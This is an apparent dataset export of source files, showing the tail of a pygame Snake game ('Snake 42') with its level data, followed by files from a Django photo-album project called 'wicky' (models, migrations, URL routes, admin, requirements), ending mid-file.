- change_level(self, level) -> None\r\n - Runs whenever player advances a level\r\n \"\"\"\r\n\r\n food_is_super = False\r\n food_position = (300, 300)\r\n\r\n def __init__(self):\r\n self.height = 600\r\n self.width = 600\r\n self.speed = 6\r\n self.score = 0\r\n self.walls = data.levels[0]\r\n self.playing = True\r\n pg.mouse.set_visible(True)\r\n data.SCREEN.fill(data.BLACK)\r\n _, self.play_music, self.snake_color = get_settings()\r\n\r\n def _draw_main_menu(self):\r\n \"\"\" Used to draw initial main menu and fetch name and snake_color settings. Returns name from settings.txt. \"\"\"\r\n\r\n data.SCREEN.fill(data.BLACK)\r\n draw_text_box('title:SNAKE 42', Rect(300, 70, 0, 0), data.RED)\r\n draw_text_box('Start', data.START_BOX, data.RED)\r\n draw_text_box('small:Enter name', Rect(300, 270, 0, 0))\r\n draw_text_box('small:Select color', Rect(300, 370, 0, 0))\r\n pg.draw.rect(data.SCREEN, data.LIGHTGREEN, data.GREEN_SNAKE_BOX)\r\n pg.draw.rect(data.SCREEN, data.ORANGE, data.ORANGE_SNAKE_BOX)\r\n\r\n music_text = \"Music off\" if self.play_music else \"Music on\"\r\n draw_text_box(music_text, data.MUSIC_BOX, text_color=data.RED)\r\n\r\n name, _, _ = get_settings()\r\n\r\n return name\r\n\r\n @staticmethod\r\n def _update_main_menu(name, name_input_color):\r\n \"\"\" Draws updated main menu. Used inside main_menu method. \"\"\"\r\n # Draw data.BLUE border around chosen snake_color box.\r\n if game.snake_color == data.GREEN_SNAKE:\r\n pg.draw.rect(data.SCREEN, data.BLUE, data.GREEN_SNAKE_BOX, 2)\r\n pg.draw.rect(data.SCREEN, data.BLACK, data.ORANGE_SNAKE_BOX, 2)\r\n else:\r\n pg.draw.rect(data.SCREEN, data.BLACK, data.GREEN_SNAKE_BOX, 2)\r\n pg.draw.rect(data.SCREEN, data.BLUE, data.ORANGE_SNAKE_BOX, 2)\r\n\r\n name_width = data.FONT.size(name)[0]\r\n # Set w and h larger to clear old borders and name.\r\n data.NAME_BOX.w += 5\r\n data.NAME_BOX.h += 5\r\n draw_text_box('', data.NAME_BOX, data.BLACK, data.BLACK)\r\n data.NAME_BOX.h -= 5\r\n # Set data.NAME_BOX width to match maximum of name_width and 100 pixels.\r\n data.NAME_BOX.w = max(100, name_width + 15)\r\n data.NAME_BOX.x = 300 - data.NAME_BOX.w / 2\r\n # Draw name in data.NAME_BOX.\r\n draw_text_box(name, data.NAME_BOX, data.RED, name_input_color, 2)\r\n\r\n pg.display.update()\r\n\r\n @staticmethod\r\n def _close_main_menu(name):\r\n \"\"\" Runs when game is started. Plays animation of menu sliding up. \"\"\"\r\n pg.mouse.set_visible(False)\r\n\r\n # Animation of menu sliding up.\r\n bottom = 600\r\n i = 1\r\n org_screen = data.SCREEN.copy()\r\n while bottom > 0:\r\n data.SCREEN.blit(org_screen, (0, bottom - 600))\r\n pg.display.update()\r\n pg.time.delay(17)\r\n bottom -= i*i / 2\r\n i += 1\r\n\r\n # Init game field graphics.\r\n data.SCREEN.fill(data.BLACK)\r\n pg.draw.rect(data.SCREEN, data.GREY, data.STATUS_BAR)\r\n text_surface = data.SMALL_FONT.render(name, True, data.RED)\r\n data.SCREEN.blit(text_surface, (10, 605))\r\n draw_text_box('small:0', Rect(580, 600, 0, 0), data.RED, data.GREY)\r\n for wall in game.walls:\r\n data.SCREEN.blit(data.BRICK, wall)\r\n\r\n def main_menu(self):\r\n \"\"\" Main menu loop etc. This method is way too large... \"\"\"\r\n finished = False\r\n name_input_color = data.GREEN\r\n name_input_active = False\r\n name = self._draw_main_menu()\r\n\r\n # Logic and loop for data.NAME_BOX and color choosing.\r\n while not finished:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n if wanna_quit():\r\n save_settings(name, game.play_music, game.snake_color)\r\n sys.exit()\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n if data.START_BOX.collidepoint(event.pos):\r\n finished = True\r\n elif data.MUSIC_BOX.collidepoint(event.pos):\r\n # noinspection PyAttributeOutsideInit\r\n game.play_music = not game.play_music\r\n if game.play_music:\r\n data.MUSIC.play(-1)\r\n else:\r\n data.MUSIC.stop()\r\n music_text = \"Music off\" if game.play_music else \"Music on\"\r\n draw_text_box(music_text, data.MUSIC_BOX, text_color=data.RED)\r\n if data.NAME_BOX.collidepoint(event.pos):\r\n name_input_active = True\r\n name_input_color = data.BLUE\r\n else:\r\n name_input_active = False\r\n name_input_color = data.GREEN\r\n if data.GREEN_SNAKE_BOX.collidepoint(event.pos):\r\n game.snake_color = data.GREEN_SNAKE\r\n elif data.ORANGE_SNAKE_BOX.collidepoint(event.pos):\r\n game.snake_color = data.ORANGE_SNAKE\r\n if event.type == pg.KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n if wanna_quit():\r\n save_settings(name, game.play_music, game.snake_color)\r\n sys.exit()\r\n else:\r\n pg.mouse.set_visible(True)\r\n elif name_input_active:\r\n if event.key == pg.K_RETURN:\r\n name_input_active = False\r\n name_input_color = data.GREEN\r\n elif event.key == pg.K_BACKSPACE:\r\n name = name[:-1]\r\n elif len(name) < 15:\r\n name += event.unicode\r\n\r\n self._update_main_menu(name, name_input_color)\r\n pg.time.delay(30)\r\n\r\n self._close_main_menu(name)\r\n save_settings(name, game.play_music, game.snake_color)\r\n return name\r\n\r\n @staticmethod\r\n def pause():\r\n \"\"\" Pauses game when p is pressed during play. Game continues when p is pressed again. \"\"\"\r\n\r\n org_screen = data.SCREEN.copy()\r\n draw_text_box('title:PAUSED', Rect(300, 275, 0, 0), data.RED)\r\n pg.display.update()\r\n while True:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return True\r\n if event.type == KEYDOWN:\r\n if event.key == K_ESCAPE:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return True\r\n elif event.key == K_p:\r\n pg.time.delay(100)\r\n data.SCREEN.blit(org_screen, (0, 0))\r\n pg.event.get()\r\n return\r\n pg.time.delay(50)\r\n\r\n @staticmethod\r\n def place_food():\r\n \"\"\" Places new food in a random free spot. \"\"\"\r\n\r\n Game.food_is_super = False\r\n\r\n while True: # Runs until the random spot is free of snake and wall.\r\n Game.food_position = (randint(0, 29) * 20, randint(0, 29) * 20)\r\n if Game.food_position not in player.snake + game.walls:\r\n # 1/20 chance for placed food to be data.SUPERFOOD\r\n # which speeds up snake when eaten.\r\n if randint(0, 20) == 0:\r\n data.SCREEN.blit(data.SUPERFOOD, Game.food_position)\r\n Game.food_is_super = True\r\n else:\r\n data.SCREEN.blit(data.FOOD, Game.food_position)\r\n break\r\n\r\n def change_level(self, level):\r\n \"\"\" Clears data.SCREEN, cuts snake, moves it to start and draws new walls. \"\"\"\r\n\r\n # Clear data.SCREEN by covering it in black.\r\n draw_text_box('', Rect(0, 0, self.width, self.height), box_color=data.BLACK)\r\n\r\n # Move snake to start.\r\n player.snake = data.STARTING_SQUARES\r\n for position in player.snake:\r\n data.SCREEN.blit(player.img, position)\r\n\r\n # Draw new walls.\r\n self.walls = data.levels[level % len(data.levels)]\r\n for wall in self.walls:\r\n data.SCREEN.blit(data.BRICK, wall)\r\n\r\n # Replace food if it's on new walls or snake.\r\n if Game.food_position in player.snake:\r\n data.SCREEN.blit(player.img, Game.food_position)\r\n self.place_food()\r\n elif Game.food_position in self.walls:\r\n data.SCREEN.blit(data.BRICK, Game.food_position)\r\n self.place_food()\r\n else:\r\n data.SCREEN.blit(data.FOOD, Game.food_position)\r\n\r\n # Change level number and update data.SCREEN.\r\n draw_text_box('small:' + str(player.lvl), Rect(560, 600, 40, 30), data.RED, data.GREY)\r\n pg.display.update()\r\n\r\n # Reset snake direction and speed.\r\n self.speed = 6\r\n player.vx = 20\r\n player.vy = 0\r\n pg.time.delay(1000)\r\n pg.event.get()\r\n\r\n\r\nclass Player:\r\n \"\"\" Class for creating a player. Contains only move method.\"\"\"\r\n\r\n def __init__(self, name):\r\n self.name = name\r\n self.snake = [(140, 100), (160, 100), (180, 100), (200, 100)]\r\n self.img = game.snake_color\r\n for position in self.snake:\r\n data.SCREEN.blit(self.img, position)\r\n self.vx = 20\r\n self.vy = 0\r\n self.lvl = 0\r\n pg.display.update()\r\n\r\n def move(self):\r\n \"\"\" Processes players actions during game loop. \"\"\"\r\n\r\n score_box = Rect(data.SMALL_FONT.size(self.name)[0] + 20, 600, 100, 30)\r\n events = pg.event.get()\r\n for event in events:\r\n if event.type == pg.QUIT:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return\r\n if event.type != KEYDOWN:\r\n continue\r\n if event.key == K_ESCAPE:\r\n if wanna_quit():\r\n game.playing = False\r\n update_highscores()\r\n return\r\n elif event.key == K_p:\r\n if game.pause():\r\n return\r\n elif event.key == K_UP and self.vy != 20:\r\n self.vx = 0\r\n self.vy = -20\r\n break\r\n elif event.key == K_RIGHT and self.vx != -20:\r\n self.vx = 20\r\n self.vy = 0\r\n break\r\n elif event.key == K_DOWN and self.vy != -20:\r\n self.vx = 0\r\n self.vy = 20\r\n break\r\n elif event.key == K_LEFT and self.vx != 20:\r\n self.vx = -20\r\n self.vy = 0\r\n break\r\n\r\n # Next position of snakes head with current direction.\r\n head_position = ((self.snake[-1][0] + self.vx) % game.width,\r\n (self.snake[-1][1] + self.vy) % game.height)\r\n\r\n if head_position == Game.food_position:\r\n data.CHOMP.play()\r\n if Game.food_is_super:\r\n game.speed = 8\r\n elif game.speed > 6:\r\n game.speed -= 1\r\n game.score += 20\r\n game.place_food()\r\n elif head_position in self.snake + game.walls:\r\n data.UGH.play()\r\n pg.time.delay(1500)\r\n game.playing = False\r\n update_highscores()\r\n return\r\n else:\r\n # Removes tail if no food was eaten.\r\n data.SCREEN.blit(data.BACK, player.snake.pop(0))\r\n if Game.food_is_super:\r\n data.SCREEN.blit(data.SUPERFOOD, Game.food_position)\r\n else:\r\n data.SCREEN.blit(data.FOOD, Game.food_position)\r\n\r\n self.snake.append(head_position)\r\n data.SCREEN.blit(self.img, head_position)\r\n\r\n # Draws game.score on STATUS_BAR.\r\n pg.draw.rect(data.SCREEN, data.GREY, score_box)\r\n text_surface = data.SMALL_FONT.render(str(game.score), True, data.RED)\r\n data.SCREEN.blit(text_surface, (score_box.x, 605))\r\n pg.display.update()\r\n\r\n if game.score >= (self.lvl + 1) * 200:\r\n draw_text_box('title:LVL UP!', Rect(300, 275, 0, 0), text_color=data.GREEN)\r\n pg.display.update()\r\n data.VICTORY.play()\r\n pg.time.delay(2000)\r\n self.lvl += 1\r\n game.change_level(self.lvl)\r\n\r\n\r\ndef draw_text_box(text, box, text_color=data.YELLOW, box_color=data.GREEN, border=0):\r\n \"\"\"\r\n Draws box with horizontally centered text. Top of text at box.y + 5.\r\n To draw with TITLE_FONT pass text parameter as \"title:<your text>\".\r\n To draw with FONT pass text parameter as \"<your text>\".\r\n To draw with SMALL_FONT pass text parameter as \"small:<your text>\".\r\n \"\"\"\r\n\r\n if text[0:6] == 'title:':\r\n text_surface = data.TITLE_FONT.render(text[6:], True, text_color)\r\n elif text[0:6] == 'small:':\r\n text_surface = data.SMALL_FONT.render(text[6:], True, text_color)\r\n else:\r\n text_surface = data.FONT.render(text, True, text_color)\r\n\r\n if box.w > 0 and box.h > 0:\r\n pg.draw.rect(data.SCREEN, box_color, box, border)\r\n data.SCREEN.blit(text_surface, (box.x + box.w/2 - text_surface.get_width()/2, box.y + 4))\r\n\r\n\r\ndef wanna_quit():\r\n \"\"\" Runs when esc or pg.QUIT activated. \"\"\"\r\n\r\n # Draw quitting dialog box in middle of screen.\r\n pg.mouse.set_visible(True)\r\n org_screen = data.SCREEN.copy()\r\n back_box = Rect(200, 200, 200, 160)\r\n quit_box = Rect(250, 260, 100, 35)\r\n continue_box = Rect(250, 305, 100, 35)\r\n draw_text_box('Wanna quit?', back_box, box_color=data.BLUE)\r\n draw_text_box('Yes', quit_box)\r\n draw_text_box('No', continue_box)\r\n pg.display.update()\r\n\r\n # Runs until player chooses Yes or No.\r\n while True:\r\n for event in pg.event.get():\r\n if event.type == MOUSEBUTTONDOWN:\r\n if quit_box.collidepoint(event.pos):\r\n return True\r\n elif continue_box.collidepoint(event.pos):\r\n data.SCREEN.blit(org_screen, (0, 0))\r\n pg.display.update()\r\n pg.mouse.set_visible(False)\r\n return False\r\n pg.time.delay(25)\r\n\r\n\r\ndef update_highscores():\r\n \"\"\" Updates and keeps record of 10 highest scores. \"\"\"\r\n\r\n score_entry = f'{player.name}- -{game.score}'\r\n score_file = 'highscores.txt'\r\n highscores = score_entry\r\n\r\n if os.path.isfile(score_file):\r\n with open(score_file) as file:\r\n score_data = file.read()\r\n\r\n if score_data:\r\n score_data = score_data.split('\\n')\r\n for line in score_data:\r\n if game.score > int(search(r'(?<=- -)\\d+$', line).group()):\r\n score_data.insert(score_data.index(line), score_entry)\r\n break\r\n highscores = '\\n'.join(score_data[:10])\r\n\r\n with open(score_file, 'w') as file:\r\n file.write(highscores)\r\n\r\n\r\nif __name__ == '__main__':\r\n pg.mixer.init()\r\n pg.mouse.set_cursor((8, 8), (4, 4), (24, 24, 24, 231, 231, 24, 24, 24), (0, 0, 0, 0, 0, 0, 0, 0))\r\n while True:\r\n game = Game()\r\n if game.play_music:\r\n data.MUSIC.play(-1)\r\n player = Player(game.main_menu()) # main_menu returns name\r\n pg.time.delay(500)\r\n while game.playing:\r\n player.move()\r\n # Delay dictates game speed.\r\n pg.time.delay(int(25 * (11 - game.speed)))\r\n save_settings(player.name, game.play_music, game.snake_color)\r\n data.MUSIC.stop()\r\nelse:\r\n # For testing purposes\r\n game = Game()\r\n" }, { "alpha_fraction": 0.47285714745521545, "alphanum_fraction": 0.5867857336997986, "avg_line_length": 25.7227725982666, "blob_id": "5ca1fade1c56ccf435a06b1b3e9d39c08af7ae3b", "content_id": "f848954d91997c3b5618c4ec3c4635983f0627bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2800, "license_type": "no_license", "max_line_length": 91, "num_lines": 101, "path": "/snake_data.py", "repo_name": "haklir/Snake_42", "src_encoding": "UTF-8", "text": "# ------------------------------------ #\r\n# LEVEL AND CONSTANT DATA FOR SNAKE 42 #\r\n# ------------------------------------ #\r\n# Field is 30x30 squares. Each square is 20x20 pixels.\r\n# Bottom of the screen has a 30 pixel tall status bar when playing.\r\n# --> total screen size is 600x630 pixels.\r\n\r\n\r\nimport os\r\nimport pygame as pg\r\nfrom random import randint\r\nfrom pygame.locals import *\r\n\r\npg.init()\r\n\r\n# Colors in rgb format\r\nGREEN = (13, 89, 28)\r\nLIGHTGREEN = (34, 177, 76)\r\nORANGE = (255, 127, 39)\r\nGREY = (160, 163, 165)\r\nYELLOW = (229, 212, 57)\r\nRED = (239, 14, 14)\r\nBLUE = (72, 92, 242)\r\nBLACK = (0, 0, 0)\r\n\r\n# Images and sounds\r\nos.chdir(\"media\")\r\nBACK = pg.image.load('back.png') # Black 20x20 square, used for resetting.\r\nFOOD = pg.image.load('food.png')\r\nSUPERFOOD = pg.image.load('SUPERFOOD.png')\r\nGREEN_SNAKE = pg.image.load('snake1.png')\r\nORANGE_SNAKE = pg.image.load('snake2.png')\r\nBRICK = pg.image.load('BRICK.png')\r\nSMALL_FONT = pg.font.Font('kindergarten.ttf', 20)\r\nFONT = pg.font.Font('kindergarten.ttf', 32)\r\nTITLE_FONT = pg.font.Font('kindergarten.ttf', 50)\r\nCHOMP = pg.mixer.Sound('CHOMP.wav')\r\nVICTORY = pg.mixer.Sound('VICTORY.wav')\r\nMUSIC = pg.mixer.Sound('MUSIC.wav')\r\nUGH = pg.mixer.Sound('UGH.wav')\r\nMUSIC.set_volume(0.45)\r\nos.chdir(\"..\")\r\n\r\n# Rects\r\nSTART_BOX = Rect(250, 200, 100, 35)\r\nNAME_BOX = Rect(250, 300, 100, 40)\r\nGREEN_SNAKE_BOX = Rect(260, 400, 30, 30)\r\nORANGE_SNAKE_BOX = Rect(310, 400, 30, 30)\r\nMUSIC_BOX = Rect(226, 470, 152, 35)\r\n\r\n# Display\r\nSCREEN = pg.display.set_mode((600, 630))\r\nSTATUS_BAR = Rect(0, 600, 600, 30)\r\n\r\n# Other constants\r\nSTARTING_SQUARES = [(140, 100), (160, 100), (180, 100), (200, 100)]\r\nDEFAULT_NAME = \"Snakey\"\r\n\r\nlevels = []\r\n\r\n\r\ndef random_level(n):\r\n \"\"\" Creates a level with n randomly placed walls. \"\"\"\r\n level = []\r\n while len(level) < n:\r\n wall = (randint(0, 14) * 40, randint(0, 29) * 20)\r\n if wall not in STARTING_SQUARES + [(220, 100), (240, 100)] + level:\r\n level.append(wall)\r\n return level\r\n\r\n\r\n# empty field\r\n_0 = []\r\nlevels.append(_0)\r\n\r\n# horizontal bars in middle\r\n_1 = [(i, 200) for i in range(100, 520, 20)] + [(i, 400) for i in range(100, 520, 20)]\r\nlevels.append(_1)\r\n\r\n# walls around field\r\n_2 = [(i, 0) for i in range(0, 600, 20)] + [(i, 580) for i in range(0, 600, 20)]\r\n_2 += [(0, i) for i in range(0, 600, 20)] + [(580, i) for i in range(0, 600, 20)]\r\nlevels.append(_2)\r\n\r\n_3 = random_level(20)\r\nlevels.append(_3)\r\n\r\n_4 = _2 + [(i, 60) for i in range(60, 521, 20)] + [(i, 520) for i in range(60, 521, 20)]\r\nlevels.append(_4)\r\n\r\n_5 = _4 + [(100, i) for i in range(100, 481, 20)] + [(480, i) for i in range(100, 481, 20)]\r\nlevels.append(_5)\r\n\r\n_6 = random_level(40)\r\nlevels.append(_6)\r\n\r\n_7 = []\r\n\r\nif __name__ == '__main__':\r\n for lvl in levels:\r\n print(lvl)\r\n" } ]
3
PaulinaLach/wicky
https://github.com/PaulinaLach/wicky
56a45085fc3ca7355d54ed79cf43ed3a8b8cb110
ac4bffb58b12becac5a1c979b113a13019d6ce8a
8cbd5aadcc0d3e97db2d4311d88ad2d9a4402ef7
refs/heads/master
2020-04-02T00:52:10.602025
2014-12-16T23:26:08
2014-12-16T23:26:08
25,225,460
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5652173757553101, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 22, "blob_id": "7b3f54f54d3e689f9a927960e13d9ac1765acaff", "content_id": "c1d0c158841b937321010ddb66b945be81b5a9ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/main/__init__.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "__author__ = 'paulina'\n" }, { "alpha_fraction": 0.6889116764068604, "alphanum_fraction": 0.6960985660552979, "avg_line_length": 29.46875, "blob_id": "08fbb219dffb75c6906c1ef955022088f617410b", "content_id": "67d1fad9a15a8b68d8b12ba0069e037845eb70e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 974, "license_type": "no_license", "max_line_length": 75, "num_lines": 32, "path": "/main/models.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.conf import settings\n\nclass Category(models.Model):\n name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.name\n\nclass Album(models.Model):\n name = models.CharField(max_length=20)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n\n def __str__(self):\n return self.name\n\nclass Photograph(models.Model):\n name = models.CharField(max_length=100)\n data = models.ImageField(upload_to='images/photos/')\n comment = models.TextField(blank=True)\n latitude = models.FloatField(blank=True)\n longitude = models.FloatField(blank=True)\n creation_date = models.DateTimeField(auto_now_add=True, editable=False)\n user = models.ForeignKey(settings.AUTH_USER_MODEL)\n category = models.ForeignKey(Category, blank=True)\n albums = models.ManyToManyField(Album, blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n get_latest_by = 'creation_date'" }, { "alpha_fraction": 0.5049954652786255, "alphanum_fraction": 0.5086285471916199, "avg_line_length": 33.9523811340332, "blob_id": "254714090cd815dbd6f4f3dd2c248552928fd882", "content_id": "e2f082c640b311ddaad4ac0036f06dac6e9bcd9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 114, "num_lines": 63, "path": "/main/migrations/0001_initial.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Album',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photograph',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ('data', models.ImageField(upload_to='')),\n ('comment', models.TextField()),\n ('latitude', models.FloatField()),\n ('longitude', models.FloatField()),\n ('albums', models.ManyToManyField(to='main.Album')),\n ('category', models.ForeignKey(to='main.Category')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserProfile',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),\n ],\n options={\n 'db_table': 'user_profile',\n },\n bases=(models.Model,),\n ),\n ]\n" }, { "alpha_fraction": 0.6833541989326477, "alphanum_fraction": 0.6833541989326477, "avg_line_length": 60.42307662963867, "blob_id": "6223109daad73031e747d5bc2b9c11ada27c2bb9", "content_id": "4b54d6328c5147124c1077834e076bffe988a3ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1598, "license_type": "no_license", "max_line_length": 243, "num_lines": 26, "path": "/main/urls.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, url\nfrom .views import CategoryIndex, CategoryCreate, CategoryShow, CategoryUpdate, CategoryDelete, AlbumIndex, AlbumCreate, AlbumShow, AlbumUpdate, AlbumDelete, PhotographIndex, PhotographCreate, PhotographShow, PhotographUpdate, PhotographDelete\n\nurlpatterns = patterns('',\n url(r'^categories/$', CategoryIndex.as_view(), name='category_index'),\n url(r'^categories/create/$', CategoryCreate.as_view(), name='category_create'),\n url(r'^categories/(?P<pk>\\d+)/$', CategoryShow.as_view(), name='category_show'),\n url(r'^categories/(?P<pk>\\d+)/update$', CategoryUpdate.as_view(), name='category_update'),\n url(r'^categories/(?P<pk>\\d+)/delete', CategoryDelete.as_view(), name='category_delete'),\n\n\n url(r'^albums/$', AlbumIndex.as_view(), name='album_index'),\n url(r'^albums/create/$', AlbumCreate.as_view(), name='album_create'),\n url(r'^albums/(?P<pk>\\d+)/$', AlbumShow.as_view(), name='album_show'),\n url(r'^albums/(?P<pk>\\d+)/update$', AlbumUpdate.as_view(), name='album_update'),\n url(r'^albums/(?P<pk>\\d+)/delete', AlbumDelete.as_view(), name='album_delete'),\n\n\n url(r'^photographs/$', PhotographIndex.as_view(), name='photograph_index'),\n url(r'^photographs/create/$', PhotographCreate.as_view(), name='photograph_create'),\n url(r'^photographs/(?P<pk>\\d+)/$', PhotographShow.as_view(), name='photograph_show'),\n url(r'^photographs/(?P<pk>\\d+)/update$', PhotographUpdate.as_view(), name='photograph_update'),\n url(r'^photographs/(?P<pk>\\d+)/delete', PhotographDelete.as_view(), name='photograph_delete'),\n\n\n)\n\n" }, { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 28.16666603088379, "blob_id": "5ed2a0b0d3d114ce8287c8b375b692d5945beca5", "content_id": "354ccd5d646e78f847cc4c242f38375aebe91ae2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/main/admin.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom main.models import Category, Album, Photograph\n\nadmin.site.register(Category)\nadmin.site.register(Album)\nadmin.site.register(Photograph)" }, { "alpha_fraction": 0.5491419434547424, "alphanum_fraction": 0.588143527507782, "avg_line_length": 24.639999389648438, "blob_id": "1ae48b61ae79850471c8931f236264098ad787ef", "content_id": "6a9632c05886643c1ef5926c339afe9be10debaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 641, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/main/migrations/0011_auto_20141025_1845.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0010_auto_20141025_1341'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='photograph',\n options={'get_latest_by': 'creation_date'},\n ),\n migrations.AddField(\n model_name='photograph',\n name='creation_date',\n field=models.DateTimeField(default=datetime.date(2014, 10, 25), auto_now_add=True),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.7094188332557678, "alphanum_fraction": 0.7134268283843994, "avg_line_length": 30.25, "blob_id": "f9b7f0fbbdb6aa86f73eab0a907fe0b13dd27c3e", "content_id": "ee32bbbbf462520680b18d4c8f46c1101318e08b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 499, "license_type": "no_license", "max_line_length": 88, "num_lines": 16, "path": "/user_account/models.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nMALE = 'male'\nFEMALE = 'female'\ngenders = (\n (MALE, 'Male'),\n (FEMALE, 'Female'),\n)\n\nclass UserAccount(AbstractUser):\n age = models.PositiveIntegerField(null=True, blank=True)\n gender = models.CharField(choices=genders, default=MALE, max_length=20, blank=False)\n avatar = models.ImageField(upload_to='images/avatar/', blank=True)\n about = models.TextField(blank=True)\n\n REQUIRED_FIELDS = [\"email\"]" }, { "alpha_fraction": 0.8214285969734192, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 13.166666984558105, "blob_id": "6142f10c64469702e8189ae4ff2459ae85091376", "content_id": "d846f6e8419e1b2011835fdc2cb47e68599f8111", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 84, "license_type": "no_license", "max_line_length": 17, "num_lines": 6, "path": "/requirements.txt", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "Django==1.7\ndjango-bootstrap3\ndjango-allauth\nPillow\ndjango_compressor\ndjango-libsass" }, { "alpha_fraction": 0.6820083856582642, "alphanum_fraction": 0.6820083856582642, "avg_line_length": 33.28571319580078, "blob_id": "03fe185533f91098b2ab5b6f5094501895e86785", "content_id": "c68094b8634684d238bd418c5e92c0e8f879892a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 83, "num_lines": 7, "path": "/user_account/urls.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^', include(admin.site.urls)),\n url(r'^(?P<username>\\w+)/$', 'user_account.views.user_show', name='user_show'),\n)" }, { "alpha_fraction": 0.8545454740524292, "alphanum_fraction": 0.8545454740524292, "avg_line_length": 26.75, "blob_id": "ed0f9f334f94b13749b31543db1f39eafb6a2b70", "content_id": "11e38053ad5f1af1ceaf8c64f53e4cb4a76f0d7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/user_account/admin.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom user_account.models import UserAccount\n\nadmin.site.register(UserAccount)" }, { "alpha_fraction": 0.7160493731498718, "alphanum_fraction": 0.7160493731498718, "avg_line_length": 22.285715103149414, "blob_id": "c7c2d2b3a07e9508ec9c4a3b7a3ca01f8678cbbf", "content_id": "d0af3018d6eb739e9c7b6d20d5e3c76dd4ab44ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 162, "license_type": "no_license", "max_line_length": 39, "num_lines": 7, "path": "/user_account/templatetags/app_filters.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django import template\n\nregister = template.Library()\n\n@register.filter(name='name')\ndef name(first_name, last_name):\n return first_name + \" \" + last_name" }, { "alpha_fraction": 0.50656658411026, "alphanum_fraction": 0.5384615659713745, "avg_line_length": 21.20833396911621, "blob_id": "2d7f5cc9d799866af0ca653195b7d7097062b2d5", "content_id": "695f732d02b0b87434e2a661256b793791985e80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 533, "license_type": "no_license", "max_line_length": 44, "num_lines": 24, "path": "/main/migrations/0010_auto_20141025_1341.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import 